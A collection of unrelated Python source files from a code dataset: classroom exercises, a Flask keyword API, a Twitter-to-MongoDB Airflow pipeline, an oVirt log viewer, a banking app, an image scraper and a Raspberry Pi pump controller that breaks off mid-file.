    '\r\n\r\n\r\nfrom IPython.display import HTML\r\nhtml = render_mp4(latest_videos()[-1])\r\nHTML(html)","repo_name":"shivamkainth/rescience","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26768411180","text":"'''Association example\n--Create a class Hardware with tow attributes 'name','installed_date'\nand add a method show_hardware which will show name and date\n\n--Create a class software with three attribute 'software_name','version','installed_date'\nand a method SHOW_Software which will show name,version and date\n\n--Create a class Computer with few attributes like 'name,'manufacture','location 'etc\nand two attributes one for hardware and one for software\n(list Type) and 5 function, for setting hardware,software,showing list of hardware,list of software and\nDisplay full specifications of the computer\n'''\n\n\nclass Hardware:\n\n def __init__(self):\n\n self.name = ''\n self.installed_date = ''\n self.list_of_hardware = []\n\n def show_hardware(self,name,installed_date):\n\n self.list_of_hardware.append(name)\n self.list_of_hardware.append(installed_date)\n\n\nclass Software:\n\n def __init__(self):\n\n self.software_name = ''\n self.version = 0\n self.installed_date = ''\n self.list_of_software=[]\n\n def show_software(self,software_name,version,installed_date):\n\n self.list_of_software.append(software_name)\n self.list_of_software.append(version)\n self.list_of_software.append(installed_date)\n\n\nclass Computer:\n\n def __init__(self,name,manufacturer,location):\n\n self.name = name\n self.manufacturer = manufacturer\n self.location = location\n self.clasHadw = Hardware()\n self.clasSoft = Software()\n\n def setting_hardware(self):\n\n print('Setting Hardware',self.clasHadw.list_of_hardware)\n print()\n\n def setting_software(self):\n\n print('Setting Software',self.clasSoft.list_of_software)\n print()\n\n def list_of_hardware(self):\n\n print('List Of Hardware: ')\n\n for hadw_list in self.clasHadw.list_of_hardware:\n print(hadw_list)\n print()\n\n def list_of_software(self):\n\n print('List of Software: ')\n\n for soft_list in self.clasSoft.list_of_software:\n print(soft_list)\n print()\n\n def show_full_specification(self):\n\n print(self.name,self.manufacturer,self.location,'contains:')\n print(self.clasHadw.list_of_hardware)\n print(self.clasSoft.list_of_software)\n\n\n\ncomp = Computer('Usman-PC','DEll','Karachi')\n\ncomp.clasHadw.show_hardware('Lan Card','Feb 5')\ncomp.clasHadw.show_hardware('Graphic Card','Jan 18')\ncomp.clasHadw.show_hardware('DVD Rom','March 18')\n\ncomp.setting_hardware()\ncomp.list_of_hardware()\n\ncomp.clasSoft.show_software('Pycharm',2.4,'Dec 2')\ncomp.clasSoft.show_software('MS office',2016,'Aril 19')\n\ncomp.setting_software()\ncomp.list_of_software()\n\ncomp.show_full_specification()","repo_name":"Mohammed-Usman/PythonCrashCourseTasks","sub_path":"association.py","file_name":"association.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27211917034","text":"#Written by Karan Jagdale, Undergraduate, IIT Bombay. \nimport serial\nimport io\nser=serial.Serial('/dev/ttyACM0',19200)\n\n\ndef bintodec(k,l):\n\tdecimal = 0\n\tbinary = []\n\tfor i in range(4):\n\t\tnzeros = 10 - len((k[l-i]))\n\t\tprint(nzeros)\n\t\tfor j in range(nzeros):\n\t\t\tbinary.append(0)\n\t\tfor j in range(len(k[l-i])-2):\n\t\t\t\tbinary.append(int((k[l-i][j+2]))) #Not appending initial 0b\n\tprint(binary)\n\tif(binary[0]==1):\n\t\tfor i in range(len(binary)):\n\t\t\tif(binary[i] == 1):\n\t\t\t\tbinary[i] = 0\n\t\t\telse:\n\t\t\t\tbinary[i] = 1\n\t\t\tdecimal = decimal + int(binary[i])*pow(2,(len(binary)-(i+1)))\n\t\treturn -(decimal+1)\n\t\n\telse:\n\t\tfor i in range(len(binary)):\n\t\t\tdecimal = decimal + int(binary[i])*pow(2,(len(binary)-(i+1)))\n\t\t\n\t\treturn decimal\n\t\t\n\n \ndef main():\n\ts = ser.read(26)\n\t#for i in s:\n\ts1 = map(bin,bytearray(s))\n\tN = bintodec(s1,17)\n\tE = bintodec(s1,21)\n\tD = bintodec(s1,25)\n\tprint(s1)\n\tprint(N,E,D)\nmain()\n\n\n\n\n\n\n\n#print(' '.join(format(ord(x), 'b') for x in s))\n#ser = io.BytesIO(b\"some initial binary data: \\x00\\x01\")\n#print(ser[0])\n#print(ord(s))\n#print(toBinary(s))\t#print((s1))\n\t#print(type(s1[0]))\n\t#print((s1[0][1]),int((s1[0][2])),(s1[0][3]))\nser.close()\n","repo_name":"KaranJagdale/Inertial-Snensors-Implementation","sub_path":"GPSDataLogging.py","file_name":"GPSDataLogging.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1032769706","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, jsonify,abort\nimport sys\nimport time\nimport json\nimport thread\n\nreload(sys)\nsys.setdefaultencoding( \"utf-8\" )\n\napp = Flask(__name__)\n\n@app.route('/api/v1.0/keyword/',methods=['GET'])\ndef keyword(task_id):\n f = open('hehe.txt')\n keywords = task_id.split(' ')\n result = []\n for line in f:\n re = {}\n content = line.split(\"\\t\")\n if len(content) == 2:\n re['title'] = content[1]\n re['labels'] = [\"0\"]\n re['time'] = \"0\"\n re['href'] = \"0\"\n result.append(re)\n for word in keywords:\n if word in line:\n re['title'] = content[0]\n re['labels'] = content[1].split(\",\")\n re['time'] = content[2]\n re['href'] = content[3]\n result.append(re)\n break\n\n # print type(str(result).replace('u\\'','\\'').decode(\"unicode-escape\"))\n return json.dumps(result)\n\n@app.route('/api/v1.0/upload/',methods=['GET'])\ndef upload(task_id):\n f = open(\"hehe.txt\",\"a\")\n keyword = task_id.split(\" \")\n f.write(str(keyword[0]) + \"\\t\" + str(keyword[1])+\"\\n\")\n return \"1\"\n\nif __name__ == '__main__':\n app.run('0.0.0.0',debug=True)\n\n","repo_name":"AndyShan/MyHeadline","sub_path":"server/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16577787516","text":"# Twitter ELT Pipeline\r\n# -----------------------------------------------------------------------\r\n# Imports\r\nfrom pymongo import MongoClient\r\nfrom airflow import DAG\r\nimport tweepy\r\nfrom textblob import TextBlob\r\nimport pandas as pd\r\nfrom airflow.operators.python import PythonOperator\r\nfrom datetime import timedelta\r\nfrom datetime import datetime\r\n# -----------------------------------------------------------------------\r\n# Airflow SetUP\r\n\r\n# Set default_args dictionary\r\ndefault_args = {\r\n # Owner of the DAG\r\n \"owner\": \"me\", \r\n # Start time \r\n \"start_date\": datetime.now(), \r\n \"depends_on_past\": False,\r\n # Retries are disabled\r\n \"retries\": 0,\r\n # If it retries, it waits a tenth of a minute to retry\r\n \"retry_delay\": timedelta(minutes=0.1), \r\n}\r\n\r\n# Creating a DAG called TWITTER_MONGO_DAG that is schedule to \r\n# repeat each minute\r\ndag = DAG(\r\n \"TWITTER_MONGO_DAG\",\r\n default_args=default_args,\r\n # Runs every minute\r\n schedule_interval=timedelta(minutes=1)\r\n)\r\n# -----------------------------------------------------------------------\r\n# Function to scrap tweets and store them in Mongo DB\r\ndef request_to_mongo():\r\n # Login Credentials for the Twitter API\r\n\r\n # Set up API credentials for Twitter API\r\n consumer_key = 'enter-consumer-key-here' \r\n consumer_secret = 'enter-consumer-secret-here'\r\n access_token = 'enter-access-token-here'\r\n access_token_secret = 'enter-access-token-secret-here'\r\n\r\n # Authenticate using the Twitter API\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n api = tweepy.API(auth)\r\n\r\n client = MongoClient(host='host.docker.internal', port=27017) # connecting client to an internal port within docker where airflow is being run\r\n\r\n # Create new Database in MongoDB called \"mydatabase\"\r\n db = client['mydatabase']\r\n\r\n # Create the collection in MongoDB for the tweets\r\n collection = db['tweets']\r\n\r\n # Get the tweets from the OpenAI Twitter account\r\n searcht = api.search_tweets(q=\"ChatGPT -filter:retweets\", lang='en', count = 100)\r\n\r\n current = []\r\n # Collect the current tweets in the Mongo DB\r\n for doc in collection.find():\r\n current.append(doc['_id'])\r\n # Search through the new and current tweets to ensure no duplicates are\r\n # into Mongo\r\n for tweet in searcht:\r\n if tweet.id in current:\r\n pass\r\n else:\r\n # Create a dictionary for each tweet\r\n tweet_info = {}\r\n # Tweet ID\r\n tweet_info[\"id\"] = tweet.id\r\n # Date the Tweet was tweeted\r\n tweet_info[\"created_at\"] = tweet.created_at\r\n # Text of the Tweet\r\n tweet_info[\"text\"] = tweet.text\r\n # ID of the user that Tweeted the tweet\r\n tweet_info[\"user_id\"] = tweet.user.id\r\n # Location of the user that tweeted\r\n tweet_info[\"location\"] = tweet.user.location\r\n # FOllwoer count of the user that tweeted\r\n tweet_info[\"followers_count\"] = tweet.user.followers_count\r\n # The number of tweets the user has tweeted\r\n tweet_info[\"statuses_count\"] = tweet.user.statuses_count\r\n # When the user created their account\r\n tweet_info[\"user_creation\"] = tweet.user.created_at\r\n # The hashtags included in the tweet\r\n tweet_info[\"hashtags\"] = [hashtag[\"text\"] for hashtag in tweet.entities.get(\"hashtags\")]\r\n # URLs in the tweet\r\n tweet_info[\"urls\"] = [url[\"expanded_url\"] for url in tweet.entities.get(\"urls\")]\r\n # Users mentioned in the tweet\r\n tweet_info[\"user_mentions\"] = [user_mention[\"screen_name\"] for user_mention in tweet.entities.get(\"user_mentions\")]\r\n # Whether the tweet contains media\r\n tweet_info[\"media\"] = [media.media_url for media in tweet.entities.get(\"media\")] if hasattr(tweet, \"media\") else None\r\n # Whether the tweet contains a poll\r\n tweet_info[\"polls\"] = [poll.options for poll in tweet.polls()] if hasattr(tweet, \"polls\") else None\r\n # The number of retweets the tweet has\r\n tweet_info[\"retweet_count\"] = tweet.retweet_count\r\n # The number of likes the tweet has\r\n tweet_info[\"favorite_count\"] = tweet.favorite_count\r\n \r\n # Inserting the data into the database in MongoDB\r\n collection.insert_one(tweet_info)\r\n# -----------------------------------------------------------------------\r\n# Function to conduct sentiment analysis on the Tweets\r\ndef sentimental():\r\n\r\n # Connecting client to an internal port within docker where airflow is being run\r\n client = MongoClient(host='host.docker.internal', port=27017) \r\n\r\n # Connecting to the MongoDB\r\n db = client['mydatabase']\r\n\r\n # Connecting to the \"tweets\" collection in MongoDB\r\n collection = db['tweets']\r\n\r\n # Gathering all the data from the database\r\n data = collection.find()\r\n\r\n # Create lists to store the tweet id, tweet text and date of tweet\r\n id_list = []\r\n text_list = []\r\n date_list = []\r\n \r\n # Appenind the id, text and date to lists\r\n for d in data:\r\n id_list.append(d['_id'])\r\n text_list.append(d['text'])\r\n date_list.append(d['created_at'])\r\n\r\n# ---------------------------------------------------------------\r\n# Sentiment Analysis\r\n # Create lists to store the sentiment scores, tweet text and date of tweet\r\n sentiment_data_list = []\r\n text_data_list = []\r\n date_data_list = []\r\n\r\n # Conduct sentiment analysis on the tweets and store each sentiment score (polarity,subjectivity)\r\n for i in range(len(text_list)):\r\n # Text blob handles the sentiment analysis of the tweets\r\n tweet_blob = TextBlob(text_list[i])\r\n # Extracting the polarity and subjectivity scores\r\n polarity, subjectivity = tweet_blob.sentiment\r\n\r\n # Classifying the sentiment (Postive, Negative, Neutral)\r\n if polarity > 0:\r\n sentiment = \"Positive\"\r\n elif polarity == 0:\r\n sentiment = \"Neutral\"\r\n else:\r\n sentiment = \"Negative\"\r\n\r\n # # Storing the sentiment scores, tweet text and tweet dates in a dictionary\r\n sentiment_data = {\"tweet_id\": id_list[i], \"polarity score\": polarity, \"sentiment\": sentiment, \"subjectivity score\": subjectivity}\r\n text_data = {\"tweet_id\": id_list[i], 'tweet_content': text_list[i]}\r\n date_data = {\"tweet_id\": id_list[i], 'tweet_date': date_list[i]}\r\n\r\n sentiment_data_list.append(sentiment_data)\r\n text_data_list.append(text_data)\r\n date_data_list.append(date_data)\r\n\r\n\r\n # Storing the sentiment scores, tweet text and tweet dates in a dataframe\r\n sentiment_df = pd.DataFrame(sentiment_data_list)\r\n text_df = pd.DataFrame(text_data_list)\r\n date_df = pd.DataFrame(date_data_list)\r\n\r\n # Choose folder path to store the dataframes\r\n folder_path = 'insert-folder-path-here'\r\n\r\n # Save the DataFrame as a CSV file in the specified folder\r\n sentiment_df.to_csv(folder_path + '/sentiment_scores.csv', index=False)\r\n text_df.to_csv(folder_path + '/tweets.csv', index=False)\r\n date_df.to_csv(folder_path + '/dates.csv', index=False)\r\n\r\n# ---------------------------------------------------------------\r\n# Airflow Tasks\r\n\r\n# task1: calls the Twitter API and stores the tweets into MongoDB\r\ntask1 = PythonOperator(\r\n task_id = 'twit_mongo',\r\n python_callable=request_to_mongo,\r\n provide_context = True,\r\n dag=dag\r\n)\r\n\r\n# task2: extracts the data from the MongoDB and conducts sentiment analysis on the tweets\r\ntask2 = PythonOperator(\r\n task_id = 'sentimental_analysis',\r\n python_callable=sentimental,\r\n provide_context = True,\r\n dag=dag\r\n)\r\n\r\ntask2.set_upstream(task1)\r\n# ---------------------------------------------------------------\r\n","repo_name":"georgelopez7/Twitter-Data-ELT","sub_path":"twitter-ELT-airflow.py","file_name":"twitter-ELT-airflow.py","file_ext":"py","file_size_in_byte":7964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3213264872","text":"from ovirt.node import ui\nfrom ovirt.node.plugins import NodePlugin\nfrom ovirt.node.utils import process, system\n\n\"\"\"\nA plugin for a support page\n\"\"\"\n\n\nclass Plugin(NodePlugin):\n def __init__(self, application):\n # Register F8: Display this plugin when F( is pressed\n show_plugin = lambda: application.switch_to_plugin(self)\n application.ui.register_hotkey([\"f8\"], show_plugin)\n super(Plugin, self).__init__(application)\n\n def name(self):\n return _(\"Support\")\n\n def rank(self):\n return 999\n\n def has_ui(self):\n return False\n\n def ui_content(self):\n ws = [ui.Header(\"header[0]\", _(\"Support Info\")),\n ui.Label(\"support.info\", _(\"Select one of the logfiles below.\")),\n ui.Divider(\"divider[0]\"),\n ui.Table(\"support.logfile\", \"\", _(\"Available Logfiles\"),\n self.__debugfiles_to_offer()),\n ]\n\n page = ui.Page(\"page\", ws)\n page.buttons = []\n self.widgets.add(page)\n return page\n\n def model(self):\n return {}\n\n def validators(self):\n return {}\n\n def on_change(self, changes):\n pass\n\n def on_merge(self, changes):\n if changes.contains_any([\"support.logfile\"]):\n logfile = changes[\"support.logfile\"]\n cmds = {\"node\": \"cat /var/log/ovirt.log | less\",\n \"ui\": \"cat /var/log/ovirt-node.log | less\",\n \"messages\": \"cat /var/log/messages | less\",\n \"audit\": \"cat /var/log/audit/audit.log | less\",\n \"dmesg\": \"dmesg | less\",\n \"journal\": \"journalctl --all --catalog --full\"\n }\n\n cmd = cmds[logfile] if logfile in cmds else None\n\n if cmd:\n contents = process.check_output(cmd, shell=True,\n stderr=process.STDOUT)\n return ui.TextViewDialog(\"output.dialog\", _(\"Logfile\"),\n contents)\n\n def __debugfiles_to_offer(self):\n items = [(\"node\", \"/var/log/ovirt.log\"),\n (\"ui\", \"/var/log/ovirt-node.log\"),\n (\"dmesg\", \"dmesg\"),\n (\"audit\", \"/var/log/audit/audit.log\")]\n\n if system.has_systemd():\n items.append((\"journal\", \"journal (systemd)\"))\n else:\n items.append((\"messages\", \"/var/log/messages\"))\n\n return items\n","repo_name":"oVirt/ovirt-node","sub_path":"src/ovirt/node/setup/core/support_page.py","file_name":"support_page.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"} +{"seq_id":"40300518138","text":"\r\nfrom mimetypes import init\r\n\r\n\r\nclass Bank :\r\n bankID = -1\r\n allBanks = set([])\r\n def __init__(self,bankFullName,bankAbbrivation):\r\n self.bankFullName = bankFullName\r\n self.bankAbbrivation = bankAbbrivation\r\n bankID+=1\r\n self.bankID = bankID\r\n\r\n @staticmethod\r\n def findBank(bankAbbrivation):\r\n for i in Bank.allBanks:\r\n if i.bankAbbrivation == bankAbbrivation:\r\n return True,i\r\n return False\r\n\r\n @staticmethod\r\n def createNewBank(bankName,bankAbbrivation):\r\n newBank = Bank(bankName,bankAbbrivation)\r\n if(Bank.allBanks.add(newBank)==False):\r\n print(\"Bank already exits!!\")\r\n return False\r\n return True\r\n\r\nclass Account:\r\n accountNumber = 0\r\n def __init__(self,bank):\r\n self.accountNumber = Account.accountNumber\r\n self.bank = bank\r\n self.balance = 1000\r\n def isAccountExists(self,bankAbbrivation):\r\n return self.bank.bankAbbrivation == bankAbbrivation\r\n\r\n def displayAccountBalance(self):\r\n print(\"Account Balance is \"+self.balance)\r\n\r\n def isSufficientBalace(self,amount):\r\n return self.balance>=amount\r\n\r\n def updateAccountBalance(self,amount,operation):\r\n if operation==\"Add\":\r\n self.balance+=amount\r\n else:\r\n self.balance-=amount\r\n return\r\n\r\n @staticmethod\r\n def createNewAccount(bankAbbrivation):\r\n isBankExits,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExits:\r\n print(\"The given bank name doest not exits!!\")\r\n return False\r\n newAccount = Account(bankObj)\r\n return newAccount\r\n\r\n\r\nclass Customer:\r\n customerID = -1\r\n allCustomers = []\r\n def __init__(self,firstName,lastName,totalBalance,userName):\r\n customerID+=1\r\n self.customerID = Customer.customerID\r\n self.firstName = firstName\r\n self.lastName = lastName\r\n self.totalBalance = totalBalance\r\n self.accounts = []\r\n self.userName = userName\r\n \r\n @staticmethod\r\n def findCustomer(self,userName):\r\n for customer in Customer.allCustomers:\r\n if customer.userName == userName:\r\n return True,customer\r\n \r\n return False\r\n \r\n\r\n\r\n def findAccount(self,bankAbbrivation):\r\n for account in self.accounts:\r\n if account.bank.bankAbbrivation == bankAbbrivation:\r\n return True,account\r\n return False\r\n \r\n def createNewAccount(self,bankAbbrivation):\r\n isAccountExists,_ = self.findAccount(bankAbbrivation)\r\n if isAccountExists:\r\n print(\"account already exits in this bank!! \")\r\n return \r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if isBankExists :\r\n return \r\n newAccount = Account.createNewAccount(bankAbbrivation)\r\n self.accounts.append(newAccount)\r\n return True,newAccount\r\n\r\n def deposit(self,bankAbbrivation,amount):\r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExists:\r\n print(\"Amount cannot be deposited as the bank does not exits\")\r\n return \r\n isAccountExits,account = self.findAccount(bankAbbrivation)\r\n if isAccountExits:\r\n account.updateAccountBalance(amount,\"Add\")\r\n print(\"Amount has been deposited in your accout successfully\")\r\n self.__updateTotalBalace()\r\n return True\r\n print(\"cannot deposit the amount as the account does not exits\")\r\n return False\r\n\r\n def Withdraw(self,amount,bankAbbrivation):\r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExists:\r\n print(\"Amount cannot be withdraw as the bank does not exits\")\r\n return \r\n isAccountExits,account = self.findAccount(bankAbbrivation)\r\n if isAccountExits:\r\n if account.isSufficientBalace(amount):\r\n account.updateAccountBalance(amount,\"subtract\")\r\n print(\"Amount has been withdrawn from your account successfully!!\")\r\n self.__updateTotalBalace()\r\n return True\r\n\r\n print(\"Insufficient account balance!\")\r\n return \r\n print(\"cannot withdraw the amount as the account does not exits\")\r\n return False\r\n \r\n def transferAmount(self,creditCustomerUserName,creditCustomerBankName,debitCustomerBankName,amount):\r\n if Customer.findCustomer(creditCustomerUserName) and Customer.findCustomer(debitCustomerBankName):\r\n customerObj = Customer.findCustomer(creditCustomerBankName)\r\n self.Withdraw(debitCustomerBankName,amount)\r\n customerObj.deposit(creditCustomerUserName,amount)\r\n return True\r\n print(\"cannot transfer the amount\")\r\n return False\r\n\r\n def selfTransfer(self,creditBankName,debitBankName,amount):\r\n if Bank.findBank(creditBankName) and Bank.findBank(debitBankName):\r\n self.Withdraw(debitBankName,amount)\r\n self.deposit(creditBankName,amount)\r\n return True\r\n print(\"cannot transfer the amount!\")\r\n return False\r\n\r\n def __updateTotalBalace(self):\r\n self.totalBalance = 0\r\n for account in self.accounts:\r\n self.totalBalance+=account.balance\r\n return self.totalBalance\r\n \r\n\r\n def displayBalance(self):\r\n print(self.firstName+\" your account balance is \"+self.totalBalance)\r\n for account in self.accounts:\r\n account.displayBalance()\r\n \r\n\r\n","repo_name":"Sahil8317/Forcepoint-Training-Assignments","sub_path":"BankingApp.py","file_name":"BankingApp.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22208067626","text":"from bs4 import *\nfrom pathlib import PurePath\nimport requests\nimport sys\nimport os\n\nclass bcolors:\n OK = \"\\033[92m\"\n WARNING = \"\\033[93m\"\n FAIL = \"\\033[91m\"\n RESET = \"\\033[0m\"\n\ndef get_links(url, url_links, dominio):\n try:\n response = requests.get(url)\n except:\n print(bcolors.FAIL + \"Error: invalid URL\" + bcolors.RESET)\n exit()\n soup = BeautifulSoup(response.text, 'html.parser')\n links = soup.findAll('a')\n for tag in links:\n cut = tag.get('href')\n if cut != None:\n if dominio in cut:\n url_links.append(cut)\n elif cut.startswith('/') == True:\n cut = \"https://\" + dominio + cut\n url_links.append(cut)\n return (url_links)\n \ndef get_images(url_links, dominio):\n url_images = []\n for link in url_links:\n try:\n response = requests.get(link)\n except:\n print(bcolors.FAIL + \"Error: invalid URsL \" + link +bcolors.RESET)\n exit()\n soup = BeautifulSoup(response.text, 'html.parser')\n images = soup.findAll('img')\n for tag in images:\n cut = tag.get('src')\n if cut != None and len(cut) > 0:\n if cut.endswith(\".png\") or cut.endswith(\".gif\") or cut.endswith(\".bmp\") or cut.endswith(\".jpg\" or cut.endswith(\".jpeg\")):\n if cut.startswith('//') == True:\n cut = cut[2:]\n if dominio in cut:\n if cut.startswith(\"https\") == False:\n cut = \"https://\" + cut\n url_images.append(cut)\n elif cut.startswith('/') and \".com\" != cut:\n cut = \"https://\" + dominio + cut\n url_images.append(cut)\n return url_images\n\ndef check(rec):\n opts = [opt for opt in sys.argv[1:] if opt.startswith(\"-\")]\n url_images = []\n url_links = []\n \n if (len(sys.argv) == 1):\n print(bcolors.FAIL + \"Error: please insert a URL\" + bcolors.RESET)\n exit()\n elif \"-r\" != opts:\n url = sys.argv[len(sys.argv) - 1]\n if url.endswith(\"/\") == False:\n url = url + '/'\n if url.startswith(\"http\") == False:\n url = \"https://\" + url\n\n dominio = url[url.index('/') + 2:-1]\n \n if rec != 0 and len(url_links) < int(rec):\n x = 0\n url_links = get_links(url, url_links, dominio)\n while len(url_links) < int(rec):\n url_links = get_links(url_links[x], url_links, dominio)\n x += x\n result = []\n for link in url_links:\n if link not in result:\n result.append(link)\n if len(result) < int(rec):\n print(bcolors.WARNING + \"Warning: has requested recursion \" + str(rec) + \" but only \" + str(len(result)) + \" urls with the supplied domain are valid\" + bcolors.RESET)\n url_links = result\n else:\n url_links.append(url)\n url_images = get_images(url_links, dominio)\n return url_images\n\ndef clean_folder(path, content):\n for file in content:\n os.remove(path + '/' + file)\n\ndef download_image(folder, url, name):\n path = os.getcwd() + '/'+ folder\n if os.path.exists(path) == False:\n os.mkdir(folder)\n name = folder + '/' + name\n f = open(name,'wb')\n try:\n response = requests.get(url)\n f.write(response.content)\n except:\n print(bcolors.WARNING + \"Invalid URL \", url + bcolors.RESET)\n return 0\n f.close()\n return 1\n\ndef main():\n opts = [opt for opt in sys.argv[1:]]\n if \"-p\" in opts:\n try:\n folder = opts[opts.index(\"-p\") + 1]\n except:\n print(bcolors.FAIL + \"Error: invalid folder\" + bcolors.RESET)\n exit()\n if folder.startswith(\"-\"):\n print(bcolors.FAIL + \"Error: invalid name for folder\" + bcolors.RESET)\n exit()\n else:\n folder = \"data\"\n\n if \"-l\" in opts:\n if \"-r\" not in opts:\n print(bcolors.FAIL + \"Error: \\\"-l\\\" specified but no recursivity \\\"-r\\\"\" + bcolors.RESET)\n exit()\n else:\n try:\n rec = opts[opts.index(\"-l\") + 1]\n except:\n print(bcolors.FAIL + \"Error: invalid argument for \\\"-l\\\"\" + bcolors.RESET)\n exit()\n if rec.isnumeric() == False:\n print(bcolors.FAIL + \"Error: invalid argument for \\\"-l\\\"\" + bcolors.RESET)\n exit()\n elif \"-r\" in opts:\n rec = 5\n else:\n rec = 0\n\n url_images = check(rec)\n if url_images == None:\n exit()\n else:\n x = 0\n path = os.getcwd() + '/' + folder\n if os.path.exists(path) == True:\n content = os.listdir(path)\n clean_folder(path, content)\n for image in url_images:\n extension = image[image.rfind('.'):len(image)]\n if \".jpeg\" in extension:\n extension = \".jpeg\"\n else:\n extension = extension[0:4]\n x += download_image(folder, url_images[x], \"image\" + str(x) + extension)\n if x == rec:\n break\n print(bcolors.OK + str(x) + bcolors.RESET + \" images downloaded successfully\")\n\nif __name__ == '__main__':\n main()","repo_name":"veaz/arachnida","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4860332946","text":"\"\"\"Exemplo de Pool nativo\"\"\"\n\nfrom multiprocessing import Pool\nfrom os import getpid\nfrom pprint import pprint\n\n\ndef soma_2(x):\n return x + 2, getpid()\n\n\nif __name__ == '__main__':\n\n workers = Pool(5)\n\n # Sync\n # result = workers.map(soma_2, range(100))\n # pprint(result)\n\n # Async\n result = workers.map_async(soma_2, range(100))\n result.wait()\n pprint(result.get())\n","repo_name":"joscelino/multiprocessamento_python","sub_path":"multi_processos/exemplos/app4.py","file_name":"app4.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3022298988","text":"# File: wordChart.py\r\n# Kevin Nakashima\r\n# Takes a text file\r\n# Program will count the number of times each word occurs in file\r\n# Program will print out a histogram of words and frequencies\r\n#==============================================================================\r\n# RESOURCES\r\n# http://programminghistorian.org/lessons/counting-frequencies\r\n# http://moderndata.plot.ly/generate-html-reports-with-python-pandas-and-plotly/\r\n# https://docs.python.org/3/tutorial/datastructures.html#list-comprehensions\r\n# https://www.tutorialspoint.com/python/python_dictionary.htm\r\n# http://help.plot.ly/embed-graphs-in-websites/\r\n# IMPORTS\r\n\r\n\r\n# CLASS DECLARATIONS\r\nclass report():\r\n __slots__ = ['word','wordlist','fName','shortest','longtest','most','least']\r\n def __init__(self, fName):\r\n self.word = \"\"\r\n self.wordlist = {}\r\n self.fName = fName\r\n self.shortest = \"\"\r\n self.longest = \"\"\r\n self.most = \"\"\r\n self.least = \"\"\r\n \r\n def addWord(self):\r\n self.word = self.word.lower()\r\n if len(self.word) == 1:\r\n self.shortest = self.word\r\n if len(self.word) > len(self.longest):\r\n self.longest = self.word\r\n if self.word in self.wordlist:\r\n #if dictionary has word, increment frequency\r\n self.wordlist[self.word] = self.wordlist[self.word] + 1\r\n else:#if not in dictionary, create\r\n self.wordlist[self.word] = 1\r\n #reset word\r\n self.word = \"\"\r\n\r\n def mostLeast(self):\r\n self.most = max(self.wordlist, key=self.wordlist.get)\r\n self.least = min(self.wordlist, key=self.wordlist.get)\r\n\r\n \r\n def writeReport(self, f):\r\n self.mostLeast()\r\n outFile = open(f + \".html\", 'w')\r\n outFile.write('''\\n\r\n \\n\r\n \\n\r\n \\n''')\r\n outFile.write(self.fName + \"Analysis\")\r\n outFile.write('''\\n\r\n \\n\r\n \\n\r\n \\n\r\n \\n''')\r\n outFile.write(\"

    Longest Word: {}

    \".format(self.longest))\r\n outFile.write(\"

    Shortest Word: {}

    \".format(self.shortest))\r\n outFile.write(\"

    Word used most: {}

    \".format(self.most))\r\n outFile.write(\"

    Word used least: {}

    \".format(self.least))\r\n for keys, values in self.wordlist.items():\r\n line = \"

    {} : {}

    \".format(keys, values)\r\n outFile.write(line)\r\n outFile.write(\"\\n\\\r\n \")\r\n #close output File\r\n outFile.close()\r\n\r\ndef main():\r\n #variable declarations\r\n r = report(input(\"Enter the file name: \"))\r\n #open file to read\r\n with open(r.fName) as f:\r\n while True:\r\n #read one character at a time\r\n c = f.read(1) \r\n #if not alphanumeric, ignore\r\n if c.isalpha():\r\n r.word += c\r\n elif c == ' ' or c == '\\n':\r\n r.addWord()\r\n elif not c:\r\n r.addWord()\r\n break\r\n\r\n f = r.fName.split('.')\r\n r.writeReport(f[0])\r\n \r\nmain()\r\n","repo_name":"Sirly/practice_python_programs","sub_path":"wordChart.py","file_name":"wordChart.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"75084273690","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\ndef digital_for_duration(pin, duration):\n if pin == 21: # If the chosen pin is for the Washing pump\n GPIO.setup(20, GPIO.OUT) # Set up the Valve & pump-out pin\n GPIO.output(20, GPIO.HIGH) # Open the Valve\n print(\"Valve (Pin 20) opened.\")\n \n elif pin == 23: # If the chosen pin is for the Sample water\n GPIO.setup(20, GPIO.OUT) # Set up the Valve & pump-out pin\n GPIO.output(20, GPIO.LOW) # Close the Valve\n print(\"Valve (Pin 20) closed.\")\n \n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, GPIO.HIGH)\n print(f\"Pin {pin} turned on for {duration} seconds.\")\n \n try:\n time.sleep(duration)\n except KeyboardInterrupt:\n print(f\"\\nInterrupted! Turning off pin {pin} immediately.\")\n \n GPIO.output(pin, GPIO.LOW)\n print(f\"Pin {pin} turned off.\")\n\ndef pwm_for_duration(pin, duty_cycle, duration):\n GPIO.setup(pin, GPIO.OUT)\n \n pwm = GPIO.PWM(pin, 100) # Frequency is hardcoded to 